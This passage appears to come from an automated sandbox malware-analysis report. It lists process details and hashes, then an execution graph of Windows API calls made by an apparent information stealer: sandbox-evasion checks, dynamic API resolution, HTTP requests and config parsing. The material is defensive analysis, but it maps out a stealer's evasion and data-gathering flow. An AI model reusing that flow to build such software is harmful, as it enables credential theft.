                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                                                              Start time:02:42:52
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                              Commandline:timeout /t 10
                                                                                                                                                                                                                                                                              Imagebase:0xb80000
                                                                                                                                                                                                                                                                              File size:25'088 bytes
                                                                                                                                                                                                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                                                              Start time:02:43:12
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5396 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                Execution Coverage:31.7%
                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                Signature Coverage:7.7%
                                                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                                                Total number of Limit Nodes:27
                                                                                                                                                                                                                                                                                execution_graph 12419 4185c0 12420 4185c2 12419->12420 12433 418610 GetModuleHandleA 12420->12433 12422 4185c9 12437 401090 15 API calls 12422->12437 12428 4185e7 12452 4011f0 GetPEB 12428->12452 12434 4187e6 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 12433->12434 12436 418628 12433->12436 12435 418840 12434->12435 12435->12422 12436->12434 12790 4108e0 GetProcessHeap HeapAlloc GetComputerNameA 12437->12790 12439 401135 strcmp 12440 401143 12439->12440 12441 401156 12439->12441 12791 4108b0 GetProcessHeap HeapAlloc GetUserNameA 12440->12791 12445 401000 GetCurrentProcess VirtualAllocExNuma 12441->12445 12443 401148 strcmp 12443->12441 12444 401160 ExitProcess 12443->12444 12446 401087 ExitProcess 12445->12446 12447 40102f VirtualAlloc 12445->12447 12448 40104b 12447->12448 12449 401083 12448->12449 12450 401058 memset VirtualFree 12448->12450 12451 401170 GetPEB 12449->12451 12450->12449 12451->12428 12453 401210 12452->12453 12454 401216 lstrcmpiW 12453->12454 12455 401229 GetPEB 12453->12455 12454->12453 12456 401224 12454->12456 12457 401240 12455->12457 12481 417270 12456->12481 12458 401246 lstrcmpiW 12457->12458 12459 401259 GetPEB 12457->12459 12458->12456 12458->12457 12460 401270 12459->12460 12461 401276 lstrcmpiW 12460->12461 12462 401289 GetPEB 12460->12462 12461->12456 12461->12460 12463 4012a0 12462->12463 12464 4012a6 lstrcmpiW 12463->12464 12465 4012b9 GetPEB 12463->12465 12464->12456 12464->12463 12466 4012d0 12465->12466 12467 4012e6 GetPEB 12466->12467 12468 4012d6 lstrcmpiW 12466->12468 12469 401300 12467->12469 12468->12456 12468->12466 12470 401316 12469->12470 12471 401306 lstrcmpiW 12469->12471 12792 4011b0 GetPEB 12470->12792 12471->12456 12471->12469 12474 4011b0 2 API calls 12475 40132e 12474->12475 12475->12456 12476 4011b0 2 API calls 12475->12476 12477 40133c 12476->12477 12477->12456 12478 4011b0 2 API calls 12477->12478 12479 40134a 12478->12479 12479->12456 12480 4011b0 2 API calls 12479->12480 12480->12456 12482 417280 12481->12482 12796 4101c0 12482->12796 12488 4172aa 12489 410340 3 API calls 12488->12489 12490 4172b9 12489->12490 12805 410290 12490->12805 12492 4172c1 12493 4172dd OpenEventA 12492->12493 12494 4172f4 12493->12494 12495 4172eb CloseHandle 12493->12495 12496 417305 CreateEventA 12494->12496 12495->12492 12497 4101c0 lstrcpyA 12496->12497 12498 417321 12497->12498 12809 410240 lstrlenA 12498->12809 12501 410240 2 API calls 12502 417373 12501->12502 12813 4188e0 12502->12813 12506 417546 12507 410290 lstrcpyA 12506->12507 12508 41754e 12507->12508 12509 4101c0 lstrcpyA 12508->12509 12510 417567 12509->12510 12511 410340 3 API calls 12510->12511 12512 41757c 12511->12512 12851 4102e0 12512->12851 12515 410290 lstrcpyA 12516 417591 12515->12516 12517 4175aa CreateDirectoryA 12516->12517 12855 410200 12517->12855 12520 410200 lstrcpyA 12521 4175d2 12520->12521 12522 410200 lstrcpyA 12521->12522 12523 4175de 12522->12523 12524 410200 lstrcpyA 12523->12524 12525 4175f4 12524->12525 12859 416b40 12525->12859 12527 417619 12528 410290 lstrcpyA 12527->12528 12529 417627 12528->12529 12530 410290 lstrcpyA 12529->12530 12531 41763b 12530->12531 12532 410290 lstrcpyA 12531->12532 12533 417658 12532->12533 12534 410290 lstrcpyA 12533->12534 12535 417663 12534->12535 12536 417670 InternetOpenA 12535->12536 12904 410530 12536->12904 12538 417694 InternetOpenA 12539 410200 lstrcpyA 12538->12539 12540 4176c7 12539->12540 12541 4101c0 lstrcpyA 12540->12541 12542 4176d7 12541->12542 12905 410540 GetWindowsDirectoryA 12542->12905 12545 410200 lstrcpyA 12546 4176ec 12545->12546 12922 402aa0 12546->12922 12548 4176f3 13064 4132f0 12548->13064 12550 417700 12551 4101c0 lstrcpyA 12550->12551 12552 41772e 12551->12552 12553 410200 lstrcpyA 12552->12553 12554 417737 12553->12554 12555 410200 lstrcpyA 12554->12555 12556 417743 12555->12556 12557 410200 lstrcpyA 12556->12557 12558 41774f 12557->12558 12559 410200 lstrcpyA 12558->12559 12560 417765 12559->12560 13084 403920 12560->13084 12562 417786 13270 412d50 12562->13270 12564 4177a0 12565 4101c0 lstrcpyA 12564->12565 12566 4177be 12565->12566 12567 410200 lstrcpyA 12566->12567 12568 4177ca 12567->12568 12569 410200 lstrcpyA 12568->12569 12570 4177d6 12569->12570 12571 410200 lstrcpyA 12570->12571 12572 4177e2 12571->12572 12573 410200 lstrcpyA 12572->12573 12574 4177f8 12573->12574 12575 403920 50 API calls 12574->12575 12576 417816 12575->12576 13311 412a90 12576->13311 12578 417830 12579 4101c0 lstrcpyA 12578->12579 12580 41784e 12579->12580 12581 410200 lstrcpyA 12580->12581 12582 41785a 12581->12582 12583 410200 lstrcpyA 12582->12583 12584 417866 12583->12584 12585 410200 lstrcpyA 12584->12585 12586 417872 12585->12586 12587 410200 lstrcpyA 12586->12587 12588 417888 12587->12588 12589 403920 50 API calls 12588->12589 12590 4178a6 12589->12590 13360 412c40 12590->13360 12592 4178c0 12593 410200 lstrcpyA 12592->12593 12594 4178d6 12593->12594 12595 410200 lstrcpyA 12594->12595 12596 4178e2 12595->12596 12597 410200 lstrcpyA 12596->12597 12598 4178ee 12597->12598 12599 410200 lstrcpyA 12598->12599 12600 417904 12599->12600 13368 413510 12600->13368 12602 417920 12603 410200 lstrcpyA 12602->12603 12604 417953 12603->12604 12605 410200 lstrcpyA 12604->12605 12606 41795f 12605->12606 12607 410200 lstrcpyA 12606->12607 12608 41796b 12607->12608 12609 410200 lstrcpyA 12608->12609 12610 417981 12609->12610 13714 40e440 12610->13714 12790->12439 12791->12443 12793 4011d0 12792->12793 12794 4011e0 12793->12794 12795 4011d6 lstrcmpiW 12793->12795 12794->12456 12794->12474 12795->12793 12795->12794 12797 4101ce 12796->12797 12798 4101ea 12797->12798 12799 4101e2 lstrcpyA 12797->12799 12800 410340 lstrlenA 12798->12800 12799->12798 12802 41036e 12800->12802 12801 410390 12804 4108b0 GetProcessHeap HeapAlloc GetUserNameA 12801->12804 12802->12801 12803 410380 lstrcpyA lstrcatA 12802->12803 12803->12801 12804->12488 12806 4102a4 12805->12806 12807 4102ce 12806->12807 12808 4102c6 lstrcpyA 12806->12808 12807->12492 12808->12807 12810 410258 12809->12810 12811 410280 12810->12811 12812 410278 lstrcpyA 12810->12812 12811->12501 12812->12811 12814 418d02 9 API calls 12813->12814 12841 4188ed 12813->12841 12815 418e04 12814->12815 12816 418d9b GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12814->12816 12817 418e11 8 API calls 12815->12817 12818 418ebc 12815->12818 12816->12815 12817->12818 12819 418ec5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12818->12819 12820 418f2e 12818->12820 12819->12820 12821 418f37 6 API calls 12820->12821 12822 418fb6 12820->12822 12821->12822 12823 418fc3 9 API calls 12822->12823 12824 419084 12822->12824 12823->12824 12825 4190f6 12824->12825 12826 41908d GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12824->12826 12827 419126 12825->12827 12828 4190ff GetProcAddress GetProcAddress 12825->12828 12826->12825 12829 419156 12827->12829 12830 41912f GetProcAddress GetProcAddress 12827->12830 12828->12827 12831 419163 10 API calls 12829->12831 12832 41923a 12829->12832 12830->12829 12831->12832 12833 419243 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12832->12833 12834 419296 12832->12834 12833->12834 12835 4192b0 12834->12835 12836 41929f GetProcAddress 12834->12836 12837 4192b9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 12835->12837 12838 41930c 12835->12838 12836->12835 12837->12838 12839 419315 GetProcAddress 12838->12839 12840 417538 12838->12840 12839->12840 12842 4113b0 12840->12842 12841->12814 12843 4101c0 lstrcpyA 12842->12843 12844 4113c7 12843->12844 12845 4101c0 lstrcpyA 12844->12845 12846 4113d3 GetSystemTime 12845->12846 12847 411462 12846->12847 12850 4113f3 12846->12850 12847->12506 12848 41143d lstrlenA 12848->12850 12850->12847 12850->12848 13760 4103a0 12850->13760 12853 41030a 12851->12853 12852 410330 12852->12515 12853->12852 12854 41031e lstrcpyA lstrcatA 12853->12854 12854->12852 12856 410215 12855->12856 12857 410229 12856->12857 12858 410221 lstrcpyA 12856->12858 12857->12520 12858->12857 12860 416b59 12859->12860 12861 410240 2 API calls 12860->12861 12862 416b6f 12861->12862 12863 410240 2 API calls 12862->12863 12886 416b7b 12863->12886 12864 416c63 lstrlenA 12864->12886 12865 4101c0 lstrcpyA 12866 416daa 12865->12866 13807 410500 StrCmpCA 12866->13807 12868 416db5 12873 416dc2 Sleep 12868->12873 12874 416e3c 12868->12874 12869 416c7c strstr 12870 416c8e strstr 12869->12870 12869->12886 12870->12886 12871 4101c0 lstrcpyA 12871->12886 12872 410240 2 API calls 12872->12886 12876 410200 lstrcpyA 12873->12876 12875 410200 lstrcpyA 12874->12875 12877 416e4a 12875->12877 12878 416ddf 12876->12878 12879 410200 lstrcpyA 12877->12879 12880 410200 lstrcpyA 12878->12880 12881 416e58 12879->12881 12882 416dee 12880->12882 12881->12527 12883 410200 lstrcpyA 12882->12883 12884 416dfa 12883->12884 12885 410200 lstrcpyA 12884->12885 12887 416e10 12885->12887 12886->12864 12886->12869 12886->12871 12886->12872 12889 410200 lstrcpyA 12886->12889 12892 410290 lstrcpyA 12886->12892 12894 416d6e 12886->12894 12903 416d94 12886->12903 13765 416910 12886->13765 13776 4169c0 12886->13776 13808 410500 StrCmpCA 12886->13808 12888 416b40 30 API calls 12887->12888 12890 416e32 12888->12890 12889->12886 12890->12881 12892->12886 12895 410240 2 API calls 12894->12895 12896 416d78 12895->12896 12897 410240 2 API calls 12896->12897 12899 416d82 12897->12899 12900 410290 lstrcpyA 12899->12900 12901 416d8b 12900->12901 12902 410290 lstrcpyA 12901->12902 12902->12903 12903->12865 12904->12538 12906 410566 GetVolumeInformationA 12905->12906 12908 4105ba 12906->12908 12909 410607 GetProcessHeap HeapAlloc 12908->12909 12910 410625 wsprintfA lstrcatA 12909->12910 12911 4106d6 12909->12911 13850 410700 GetCurrentHwProfileA 12910->13850 12912 4101c0 lstrcpyA 12911->12912 12914 4106e6 12912->12914 12914->12545 12915 410671 12916 410686 lstrlenA 12915->12916 12917 410695 12916->12917 13866 411e60 malloc strncpy 12917->13866 12919 4106a3 12920 4101c0 lstrcpyA 12919->12920 12921 4106cd 12920->12921 12921->12914 12923 410200 lstrcpyA 12922->12923 12924 402ac9 12923->12924 12925 402790 5 API calls 12924->12925 12926 402ad6 12925->12926 12927 4101c0 lstrcpyA 12926->12927 12928 402ae7 12927->12928 12929 4101c0 lstrcpyA 12928->12929 12930 402af4 12929->12930 12931 4101c0 lstrcpyA 12930->12931 12932 402b01 12931->12932 12933 4101c0 lstrcpyA 12932->12933 12934 402b0e 12933->12934 12935 4101c0 lstrcpyA 12934->12935 12936 402b1b 12935->12936 12937 402b28 InternetOpenA StrCmpCA 12936->12937 12938 403002 InternetCloseHandle 12937->12938 12939 402b57 12937->12939 12944 403017 12938->12944 12940 4113b0 4 API calls 12939->12940 12941 402b65 12940->12941 12942 4102e0 2 API calls 12941->12942 12943 402b75 12942->12943 12946 410290 lstrcpyA 12943->12946 12945 410200 lstrcpyA 12944->12945 12957 40302b 12945->12957 12947 402b7e 12946->12947 12948 410340 3 API calls 12947->12948 12949 402b9c 12948->12949 12950 410290 lstrcpyA 12949->12950 12951 402ba4 12950->12951 12952 410340 3 API calls 12951->12952 12953 402bb8 12952->12953 12954 410290 lstrcpyA 12953->12954 12955 402bc0 12954->12955 12956 4102e0 2 API calls 12955->12956 12958 402bd3 12956->12958 12957->12548 12959 410290 lstrcpyA 12958->12959 12960 402bdb 12959->12960 12961 410340 3 API calls 12960->12961 12962 402bef 12961->12962 12963 410290 lstrcpyA 12962->12963 12964 402bf7 12963->12964 12965 410340 3 API calls 12964->12965 12966 402c0b 12965->12966 12967 410290 lstrcpyA 12966->12967 12968 402c13 12967->12968 12969 410340 3 API calls 12968->12969 12970 402c2d 12969->12970 12971 4102e0 2 API calls 12970->12971 12972 402c3b 12971->12972 12973 410290 lstrcpyA 12972->12973 12974 402c44 12973->12974 12975 402c56 InternetConnectA 12974->12975 12975->12938 12976 402c96 HttpOpenRequestA 12975->12976 12977 402cd5 12976->12977 12978 402ff8 InternetCloseHandle 12976->12978 12979 402ce2 InternetSetOptionA 12977->12979 12980 402cfa 12977->12980 12978->12938 12979->12980 12981 410340 3 API calls 12980->12981 12982 402d0a 12981->12982 12983 410290 lstrcpyA 12982->12983 12984 402d12 12983->12984 12985 4102e0 2 API calls 12984->12985 12986 402d25 12985->12986 12987 410290 lstrcpyA 12986->12987 12988 402d2d 12987->12988 12989 410340 3 API calls 12988->12989 12990 402d41 12989->12990 12991 410290 lstrcpyA 12990->12991 12992 402d49 12991->12992 12993 410340 3 API calls 12992->12993 12994 402d5d 12993->12994 12995 410290 lstrcpyA 12994->12995 12996 402d65 12995->12996 12997 410340 3 API calls 12996->12997 12998 402d79 12997->12998 12999 410290 lstrcpyA 12998->12999 13000 402d81 12999->13000 13001 410340 3 API calls 13000->13001 13002 402d95 13001->13002 13003 410290 lstrcpyA 13002->13003 13004 402d9d 13003->13004 13005 4102e0 2 API calls 13004->13005 13006 402db0 13005->13006 13007 410290 lstrcpyA 13006->13007 13008 402db8 13007->13008 13009 410340 3 API calls 13008->13009 13010 402dcc 13009->13010 13011 410290 lstrcpyA 13010->13011 13012 402dd4 13011->13012 13013 410340 3 API calls 13012->13013 13014 402de8 13013->13014 13015 410290 lstrcpyA 13014->13015 13016 402df0 13015->13016 13017 4102e0 2 API calls 13016->13017 13018 402e00 13017->13018 13019 410290 lstrcpyA 13018->13019 13020 402e08 13019->13020 13021 410340 3 API calls 13020->13021 13022 402e1c 13021->13022 13023 410290 lstrcpyA 13022->13023 13024 402e24 13023->13024 13025 410340 3 API calls 13024->13025 13026 402e38 13025->13026 13027 410290 lstrcpyA 13026->13027 13028 402e40 13027->13028 13029 410340 3 API calls 13028->13029 13030 402e54 13029->13030 13031 410290 lstrcpyA 13030->13031 13032 402e5c 13031->13032 13033 410340 3 API calls 13032->13033 13034 402e70 13033->13034 13035 410290 lstrcpyA 13034->13035 13036 402e78 13035->13036 13037 4102e0 2 API calls 13036->13037 13038 402e8b 13037->13038 13039 410290 lstrcpyA 13038->13039 13040 402e93 13039->13040 13041 4101c0 lstrcpyA 13040->13041 13042 402ea9 13041->13042 13043 4102e0 2 API calls 13042->13043 13044 402eb7 13043->13044 13045 4102e0 2 API calls 13044->13045 13046 402ec3 13045->13046 13047 410290 lstrcpyA 13046->13047 13050 402ecb 13047->13050 13048 402ef8 lstrlenA 13048->13050 13049 402f15 lstrlenA 13049->13050 13050->13048 13050->13049 13051 402f32 Sleep 13050->13051 13052 402f73 InternetReadFile 13050->13052 13053 402f50 13051->13053 13054 402f43 13051->13054 13055 402f90 13052->13055 13056 402fe1 InternetCloseHandle 13052->13056 13057 4101c0 lstrcpyA 13053->13057 13054->13050 13054->13053 13055->13056 13062 402f97 13055->13062 13058 402ff2 13056->13058 13059 402f5d 13057->13059 13058->12978 13059->12957 13060 410340 3 API calls 13060->13062 13061 410290 lstrcpyA 13061->13062 13062->13056 13062->13060 13062->13061 13063 402fc3 InternetReadFile 13062->13063 13063->13056 13063->13062 13871 410530 13064->13871 13066 41330f StrCmpCA 13067 413323 13066->13067 13068 41331b ExitProcess 13066->13068 13069 41332a strtok_s 13067->13069 13070 413345 13069->13070 13071 4134f6 13069->13071 13072 413360 strtok_s 13070->13072 13073 4133a0 StrCmpCA 13070->13073 13074 4134b3 StrCmpCA 13070->13074 13075 413452 StrCmpCA 13070->13075 13076 413475 StrCmpCA 13070->13076 13077 413384 StrCmpCA 13070->13077 13078 413494 StrCmpCA 13070->13078 13079 4133d8 StrCmpCA 13070->13079 13080 4133bc StrCmpCA 13070->13080 13081 41340c StrCmpCA 13070->13081 13082 41342f StrCmpCA 13070->13082 13083 410240 2 API calls 13070->13083 13071->12550 13072->13070 13072->13071 13073->13070 13073->13072 13074->13070 13075->13070 13075->13072 13076->13070 13077->13070 13077->13072 13078->13070 13079->13070 13079->13072 13080->13070 13080->13072 13081->13070 13081->13072 13082->13070 13082->13072 13083->13070 13085 410200 lstrcpyA 13084->13085 13086 403949 13085->13086 13087 402790 5 API calls 13086->13087 13088 403956 13087->13088 13089 4101c0 lstrcpyA 13088->13089 13090 403965 13089->13090 13091 4101c0 lstrcpyA 13090->13091 13092 403972 13091->13092 13093 4101c0 lstrcpyA 13092->13093 13094 40397f 13093->13094 13095 4101c0 lstrcpyA 13094->13095 13096 40398c 13095->13096 13097 4101c0 lstrcpyA 13096->13097 13098 403999 13097->13098 13099 4039a7 InternetOpenA StrCmpCA 13098->13099 13100 404010 InternetCloseHandle 13099->13100 13101 4039d6 13099->13101 13103 404021 13100->13103 13102 4113b0 4 API calls 13101->13102 13104 4039e4 13102->13104 13874 407790 lstrlenA 13103->13874 13105 4102e0 2 API calls 13104->13105 13107 4039f9 13105->13107 13109 410290 lstrcpyA 13107->13109 13114 403a01 13109->13114 13110 410240 2 API calls 13111 404042 13110->13111 13113 410340 3 API calls 13111->13113 13112 404081 13116 410200 lstrcpyA 13112->13116 13115 404055 13113->13115 13118 410340 3 API calls 13114->13118 13117 410290 lstrcpyA 13115->13117 13132 403f5d 13116->13132 13119 40405d 13117->13119 13120 403a23 13118->13120 13122 404064 GetProcessHeap HeapFree 13119->13122 13121 410290 lstrcpyA 13120->13121 13123 403a2b 13121->13123 13122->13112 13124 410340 3 API calls 13123->13124 13125 403a3f 13124->13125 13126 410290 lstrcpyA 13125->13126 13127 403a47 13126->13127 13128 4102e0 2 API calls 13127->13128 13129 403a57 13128->13129 13130 410290 lstrcpyA 13129->13130 13131 403a5f 13130->13131 13133 410340 3 API calls 13131->13133 13132->12562 13134 403a73 13133->13134 13135 410290 lstrcpyA 13134->13135 13136 403a7b 13135->13136 13137 410340 3 API calls 13136->13137 13138 403a8f 13137->13138 13139 410290 lstrcpyA 13138->13139 13140 403a97 13139->13140 13141 410340 3 API calls 13140->13141 13142 403ab1 13141->13142 13143 4102e0 2 API calls 13142->13143 13144 403abd 13143->13144 13145 410290 lstrcpyA 13144->13145 13146 403ac8 13145->13146 13147 403ad9 InternetConnectA 13146->13147 13147->13100 13148 403b19 HttpOpenRequestA 13147->13148 13149 404006 InternetCloseHandle 13148->13149 13150 403b5c 13148->13150 13149->13100 13151 403b63 InternetSetOptionA 13150->13151 13152 403b7b 13150->13152 13151->13152 13153 410340 3 API calls 13152->13153 13154 403b91 13153->13154 13155 410290 lstrcpyA 13154->13155 13156 403b99 13155->13156 13157 4102e0 2 API calls 13156->13157 13158 403bac 13157->13158 13159 410290 lstrcpyA 13158->13159 13160 403bb4 13159->13160 13161 410340 3 API calls 13160->13161 13162 403bc8 13161->13162 13163 410290 lstrcpyA 13162->13163 13164 403bd0 13163->13164 13165 410340 3 API calls 13164->13165 13166 403be4 13165->13166 13167 410290 lstrcpyA 13166->13167 13168 403bec 13167->13168 13169 410340 3 API calls 13168->13169 13170 403c00 13169->13170 13171 410290 lstrcpyA 13170->13171 13172 403c08 13171->13172 13173 410340 3 API calls 13172->13173 13174 403c1c 13173->13174 13175 410290 lstrcpyA 13174->13175 13176 403c24 13175->13176 13177 4102e0 2 API calls 13176->13177 13178 403c3a 13177->13178 13179 410290 lstrcpyA 13178->13179 13180 403c42 13179->13180 13181 410340 3 API calls 13180->13181 13182 403c56 13181->13182 13183 410290 lstrcpyA 13182->13183 13184 403c5e 13183->13184 13185 410340 3 API calls 13184->13185 13186 403c72 13185->13186 13187 410290 lstrcpyA 13186->13187 13188 403c7a 13187->13188 13189 4102e0 2 API calls 13188->13189 13190 403c8d 13189->13190 13191 410290 lstrcpyA 13190->13191 13192 403c95 13191->13192 13193 410340 3 API calls 13192->13193 13194 403ca9 13193->13194 13195 410290 lstrcpyA 13194->13195 13196 403cb1 13195->13196 13197 410340 3 API calls 13196->13197 13198 403cc5 13197->13198 13199 410290 lstrcpyA 13198->13199 13200 403ccd 13199->13200 13201 410340 3 API calls 13200->13201 13202 403ce1 13201->13202 13203 410290 lstrcpyA 13202->13203 13204 403ce9 13203->13204 13205 410340 3 API calls 13204->13205 13206 403cfd 13205->13206 13207 410290 lstrcpyA 13206->13207 13208 403d05 13207->13208 13209 410340 3 API calls 13208->13209 13210 403d1a 13209->13210 13211 410290 lstrcpyA 13210->13211 13212 403d22 13211->13212 13213 410340 3 API calls 13212->13213 13214 403d36 13213->13214 13215 410290 lstrcpyA 13214->13215 13216 403d3e 13215->13216 13217 410340 3 API calls 13216->13217 13218 403d52 13217->13218 13219 410290 lstrcpyA 13218->13219 13220 403d5a 13219->13220 13221 4102e0 2 API calls 13220->13221 13222 403d6d 13221->13222 13223 410290 lstrcpyA 13222->13223 13224 403d75 13223->13224 13225 410340 3 API calls 13224->13225 13226 403d89 13225->13226 13227 410290 lstrcpyA 13226->13227 13228 403d91 13227->13228 13229 410340 3 API calls 13228->13229 13230 403da5 13229->13230 13231 410290 lstrcpyA 13230->13231 13232 403dad 13231->13232 13233 410340 3 API calls 13232->13233 13234 403dc1 13233->13234 13235 410290 lstrcpyA 13234->13235 13236 403dc9 13235->13236 13237 410340 3 API calls 13236->13237 13238 403ddd 13237->13238 13239 410290 lstrcpyA 13238->13239 13240 403de5 13239->13240 13241 4102e0 2 API calls 13240->13241 13242 403df8 13241->13242 13243 410290 lstrcpyA 13242->13243 13244 403e00 13243->13244 13245 403e14 lstrlenA 13244->13245 13872 410530 13245->13872 13247 403e27 lstrlenA GetProcessHeap HeapAlloc 13248 403f35 InternetCloseHandle InternetCloseHandle InternetCloseHandle 13247->13248 13250 403e4b 13247->13250 13249 4101c0 lstrcpyA 13248->13249 13249->13132 13251 403e65 lstrlenA memcpy 13250->13251 13873 410530 13251->13873 13253 403e81 lstrlenA 13254 403e93 13253->13254 13255 403ea3 lstrlenA memcpy 13254->13255 13257 403ec0 13255->13257 13256 403ed8 lstrlenA 13256->13257 13257->13256 13258 403f62 13257->13258 13259 403ef6 Sleep 13257->13259 13262 403f6e GetProcessHeap HeapFree 13258->13262 13260 403f10 13259->13260 13261 403f0b 13259->13261 13264 403f1c GetProcessHeap HeapFree 13260->13264 13261->13257 13261->13260 13263 403f80 InternetReadFile 13262->13263 13265 403ff7 InternetCloseHandle 13263->13265 13268 403f9d 13263->13268 13264->13248 13264->13263 13265->13149 13266 410340 3 API calls 13266->13268 13267 410290 lstrcpyA 13267->13268 13268->13265 13268->13266 13268->13267 13269 403fd9 InternetReadFile 13268->13269 13269->13265 13269->13268 13878 410530 13270->13878 13272 412d69 strtok_s 13275 412d84 13272->13275 13280 412e3e 13272->13280 13273 412db0 strtok_s 13273->13275 13273->13280 13274 412e8b StrCmpCA 13279 412ec0 strtok_s 13274->13279 13275->13273 13275->13274 13276 410240 lstrlenA lstrcpyA 13275->13276 13275->13280 13292 412fca 13275->13292 13276->13275 13277 410240 lstrlenA lstrcpyA 13277->13292 13278 410240 lstrlenA lstrcpyA 13278->13280 13279->13280 13281 412f4d 13279->13281 13280->12564 13280->13274 13280->13278 13280->13279 13284 413262 StrCmpCA 13280->13284 13280->13292 13281->12564 13282 413010 strtok_s 13282->13292 13295 4132d3 13282->13295 13283 41307f lstrcpyA 13879 411550 SHGetFolderPathA 13283->13879 13285 413277 StrCmpCA 13284->13285 13284->13292 13285->13292 13287 4133a0 StrCmpCA 13293 413360 strtok_s 13287->13293 13287->13295 13288 413384 StrCmpCA 13288->13293 13288->13295 13289 4133d8 StrCmpCA 13289->13293 13289->13295 13290 4133bc StrCmpCA 13290->13293 13290->13295 13291 41340c StrCmpCA 13291->13293 13291->13295 13292->13277 13292->13282 13292->13283 13292->13284 13292->13287 13292->13288 13292->13289 13292->13290 13292->13291 13292->13295 13302 4130ac lstrcpyA 13292->13302 13303 4130d8 lstrcpyA 13292->13303 13304 413104 lstrcpyA 13292->13304 13305 413130 lstrcpyA 13292->13305 13306 411550 lstrcpyA SHGetFolderPathA 13292->13306 13307 41315c lstrcpyA 13292->13307 13308 413188 lstrcpyA 13292->13308 13309 4131b4 lstrcpyA 13292->13309 13310 4131e0 lstrcpyA 13292->13310 13293->13295 13296 4134f6 13293->13296 13294 410240 2 API calls 13294->13295 13295->12564 13295->13287 13295->13288 13295->13289 13295->13290 13295->13291 13295->13293 13295->13294 13297 4134b3 StrCmpCA 13295->13297 13298 413452 StrCmpCA 13295->13298 13299 413475 StrCmpCA 13295->13299 13300 413494 StrCmpCA 13295->13300 13301 41342f StrCmpCA 13295->13301 13296->12564 13297->13295 13298->13293 13298->13295 13299->13295 13300->13295 13301->13293 13301->13295 13302->13292 13303->13292 13304->13292 13305->13292 13306->13292 13307->13292 13308->13292 13309->13292 13310->13292 13882 410530 13311->13882 13313 412aa9 strtok_s 13314 412c24 13313->13314 13321 412ac4 13313->13321 13314->12578 13315 412b00 strtok_s 13315->13314 13315->13321 13316 412bc3 StrCmpCA 13316->13321 13317 412acb StrCmpCA 13317->13315 13318 412b92 StrCmpCA 13318->13321 13319 412b3f StrCmpCA 13319->13321 13320 410240 lstrlenA lstrcpyA 13320->13321 13321->13315 13321->13316 13321->13317 13321->13318 13321->13319 13321->13320 13323 412d8b 13321->13323 13327 412e3e 13321->13327 13322 410240 lstrlenA lstrcpyA 13322->13323 13323->13322 13325 412db0 strtok_s 13323->13325 13326 412e8b StrCmpCA 13323->13326 13323->13327 13333 412fca 13323->13333 13324 412ec0 strtok_s 13324->13327 13328 412f4d 13324->13328 13325->13323 13325->13327 13326->13324 13327->12578 13327->13324 13327->13326 13329 413262 StrCmpCA 13327->13329 13331 410240 lstrlenA lstrcpyA 13327->13331 13327->13333 13328->12578 13330 413277 StrCmpCA 13329->13330 13329->13333 13330->13333 13331->13327 13332 410240 lstrlenA lstrcpyA 13332->13333 13333->13329 13333->13332 13334 413010 strtok_s 13333->13334 13335 41307f lstrcpyA 13333->13335 13337 4133a0 StrCmpCA 13333->13337 13338 413384 StrCmpCA 13333->13338 13339 4133d8 StrCmpCA 13333->13339 13340 4133bc StrCmpCA 13333->13340 13341 41340c StrCmpCA 13333->13341 13344 4132d3 13333->13344 13346 4130ac lstrcpyA 13333->13346 13352 4130d8 lstrcpyA 13333->13352 13353 413104 lstrcpyA 13333->13353 13354 411550 lstrcpyA SHGetFolderPathA 13333->13354 13355 413130 lstrcpyA 13333->13355 13356 41315c lstrcpyA 13333->13356 13357 413188 lstrcpyA 13333->13357 13358 4131b4 